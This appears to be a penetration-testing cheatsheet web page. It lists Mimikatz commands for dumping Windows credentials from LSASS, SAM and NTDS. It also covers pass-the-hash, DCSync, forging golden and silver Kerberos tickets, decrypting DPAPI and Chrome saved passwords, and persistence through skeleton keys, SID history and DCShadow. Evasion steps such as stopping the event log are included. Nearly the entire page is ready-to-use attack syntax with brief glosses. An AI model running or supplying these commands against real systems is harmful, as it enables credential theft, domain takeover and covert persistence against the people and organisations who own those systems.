← All Cheatsheets
active-directory

Mimikatz — Windows Credential Dumping

Mimikatz extracts plaintext passwords, hashes, PIN codes, and Kerberos tickets from Windows memory.

91 views Jul 2026 lazyhackers
Core Commands (12)
privilege::debug
Get SeDebugPrivilege (required for most ops)
priv debug
token::elevate
Impersonate SYSTEM token
priv system
sekurlsa::logonpasswords
Dump plaintext passwords from LSASS memory
lsass creds plaintext
sekurlsa::wdigest
Dump WDigest credentials (older Windows)
wdigest creds
sekurlsa::pth /user:admin /domain:corp /ntlm:HASH /run:cmd.exe
Pass-the-Hash — spawn cmd as user
pth pass-the-hash
sekurlsa::tickets
List Kerberos tickets in memory
kerberos tickets
sekurlsa::tickets /export
Export all Kerberos tickets to .kirbi files
kerberos tickets export
sekurlsa::ekeys
Dump Kerberos encryption keys (AES keys)
kerberos aes
sekurlsa::dpapi
Dump DPAPI credentials
dpapi creds
sekurlsa::msv
Dump NTLM/SHA1 hashes from LSASS (msv1_0 provider)
sekurlsa ntlm
sekurlsa::credman
Dump Credential Manager secrets from LSASS
sekurlsa credman
sekurlsa::ssp
Dump cleartext creds cached by SSP providers
sekurlsa ssp
SAM & NTDS (10)
lsadump::sam
Dump SAM database local hashes
sam hashes
lsadump::lsa /patch
Dump LSA secrets
lsa secrets
lsadump::dcsync /domain:corp.local /user:Administrator
DCSync — pull hash of specific user
dcsync da
lsadump::dcsync /domain:corp.local /all /csv
DCSync — dump ALL domain hashes to CSV
dcsync all
lsadump::cache
Dump cached domain credentials (MSCache2)
cache creds
lsadump::secrets
Dump LSA secrets (service accounts, etc)
lsa secrets
lsadump::dcsync /domain:corp.local /user:krbtgt
Targeted DCSync of krbtgt (golden-ticket material)
dcsync krbtgt
lsadump::trust /patch
Dump inter-realm trust keys (forge inter-domain TGTs)
trust kerberos
lsadump::backupkeys /system:dc01.corp.local /export
Export the domain DPAPI backup key — decrypts ANY user masterkey
dpapi backupkey
lsadump::dcshadow /object:victim /attribute:sidHistory /value:S-1-5-21-XXXX-519
DCShadow — push AD changes as a rogue DC (stealth persistence)
dcshadow persistence
Kerberos Ticket Attacks (5)
kerberos::list /export
List and export Kerberos tickets
kerberos tickets
kerberos::ptt ticket.kirbi
Pass-the-Ticket — inject .kirbi into session
ptt kerberos
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:HASH /ticket:golden.kirbi
Create Golden Ticket (offline)
golden-ticket kerberos
kerberos::silver /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:server /service:cifs /rc4:HASH /ticket:silver.kirbi
Create Silver Ticket for service
silver-ticket kerberos
kerberos::purge
Delete all Kerberos tickets from memory
kerberos cleanup
Remote & Evasion (4)
invoke-mimikatz -DumpCreds
PowerSploit Invoke-Mimikatz (in-memory, no disk)
powershell invoke evasion
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > creds.txt
Run Mimikatz non-interactively
cli noninteractive
procdump.exe -ma lsass.exe lsass.dmp
Dump LSASS process with ProcDump (then analyze offline)
lsass dump procdump
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
Analyze offline LSASS dump
lsass minidump offline
DPAPI & Vault (6)
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\SID\mkfile" /sid:S-1-5-21-XXXX /password:Passw0rd
Decrypt a user DPAPI masterkey with their password
dpapi masterkey
dpapi::masterkey /in:mkfile /rpc
Decrypt a masterkey via the domain backup key (asks the DC over RPC)
dpapi rpc
dpapi::cred /in:credfile
Decrypt a DPAPI credential blob (masterkey must be cached)
dpapi credentials
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data"
Decrypt Chrome saved passwords via DPAPI
dpapi chrome browser
vault::cred /patch
Dump stored Windows Vault credentials
vault
vault::list
List Windows Vault entries
vault
Persistence & Advanced (5)
misc::skeleton
Install Skeleton Key on the DC — a master password for every account (run with debug on the DC)
skeleton persistence
lsadump::setntlm /user:victim /server:dc01.corp.local /ntlm:NEWHASH
Remotely set a user's NTLM hash (needs reset rights)
setntlm
crypto::capi && crypto::certificates /export /systemstore:LOCAL_MACHINE
Make CAPI keys exportable, then export machine certs + private keys (incl. CA key)
crypto certificates
misc::addsid victim S-1-5-21-XXXX-519
Add SID history (e.g. Domain Admins) to an account
sidhistory persistence
event::drop
Patch the event-log service in memory to stop logging
evasion eventlog